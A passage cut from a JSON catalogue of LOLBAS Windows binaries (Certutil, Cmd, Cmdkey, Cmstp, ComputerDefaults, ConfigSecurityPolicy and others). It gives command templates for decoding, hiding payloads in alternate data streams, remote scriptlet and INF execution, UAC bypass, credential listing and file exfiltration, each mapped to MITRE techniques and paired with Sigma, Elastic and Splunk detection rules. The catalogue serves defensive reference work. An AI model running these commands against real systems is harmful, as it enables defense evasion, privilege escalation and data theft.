ndpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:6","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decodehex {PATH:.hex} {PATH}","description":"Command to decode a hexadecimal-encoded file.","usecase":"Decode files to evade defensive measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:change-exe:0","toolId":"lolbas:change-exe","toolName":"Change.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"change.exe user","description":"Once executed, `change.exe` will execute `chgusr.exe` in the same folder. Thus, if `change.exe` is copied to a folder and an arbitrary executable is renamed to `chgusr.exe`, `change.exe` will spawn it. Instead of `user`, it is also possible to use `port` or `logon` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"change.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cipher-exe:0","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher /w:{PATH_ABSOLUTE:folder}","description":"Zero out a file","usecase":"Can be used to forensically erase a file.","mitre":["T1485"],"privilege":"user","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cipher-exe:1","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher.exe /e {PATH_ABSOLUTE}","description":"Encrypt a file","usecase":"Can be used to impair defences by e.g. encrypting a critical EDR solution file.","mitre":["T1562"],"privilege":"admin","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:0","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat","description":"Add content to an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:1","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe - < {PATH}:payload.bat","description":"Execute payload.bat stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1059.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:2","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"type {PATH_SMB} > {PATH_ABSOLUTE}","description":"Downloads a specified file from a WebDAV server to the target file.","usecase":"Download/copy a file from a WebDAV server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:3","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"type {PATH_ABSOLUTE} > {PATH_SMB}","description":"Uploads a specified file to a WebDAV server.","usecase":"Upload a file to a WebDAV server","mitre":["T1048.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmdkey-exe:0","toolId":"lolbas:cmdkey-exe","toolName":"Cmdkey.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"cmdkey /list","description":"List cached credentials","usecase":"Get credential information from host","mitre":["T1078"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"}],"references":["https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey","https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmdl32-exe:0","toolId":"lolbas:cmdl32-exe","toolName":"cmdl32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmdl32 /vpn /lan %cd%\\config","description":"Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where \"X\" denotes a random number or letter.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %TMP%\\config.log"},{"type":"IOC","value":"Useragent Microsoft(R) Connection Manager Vpn File Update"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/151","https://twitter.com/ElliotKillick/status/1455897435063074824","https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/","https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmstp-exe:0","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}","description":"Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Download and run scriptlets from internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmstp-exe:1","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"cmstp.exe /ni /s {REMOTEURL:.inf}","description":"Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Execute code directly from Internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmstp-exe:2","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /nf","description":"cmstp.exe reads the `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via `cmstp.exe`.","usecase":"Proxy execution of a malicious DLL via registry modification.","mitre":["T1218.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:colorcpl-exe:0","toolId":"lolbas:colorcpl-exe","toolName":"Colorcpl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"colorcpl {PATH}","description":"Copies the referenced file to C:\\Windows\\System32\\spool\\drivers\\color\\.","usecase":"Copies file(s) to a subfolder of a generally trusted folder (c:\\Windows\\System32), which can be used to hide files or make them blend into the environment.","mitre":["T1036.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml"},{"type":"IOC","value":"colorcpl.exe writing files"}],"references":["https://twitter.com/eral4m/status/1480468728324231172","https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:computerdefaults-exe:0","toolId":"lolbas:computerdefaults-exe","toolName":"ComputerDefaults.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ComputerDefaults.exe","description":"Upon execution, ComputerDefaults.exe checks two registry values at HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command; if these are set by an attacker, the set command will be executed as a high-integrity process without a UAC prompt being displayed to the user. See 'resources' for which registry keys/values to set.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Event ID 10"},{"type":"IOC","value":"A binary or script spawned as a child process of ComputerDefaults.exe"},{"type":"IOC","value":"Changes to HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml"}],"references":["https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b","https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:configsecuritypolicy-exe:0","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:configsecuritypolicy-exe:1","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ConfigSecurityPolicy.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 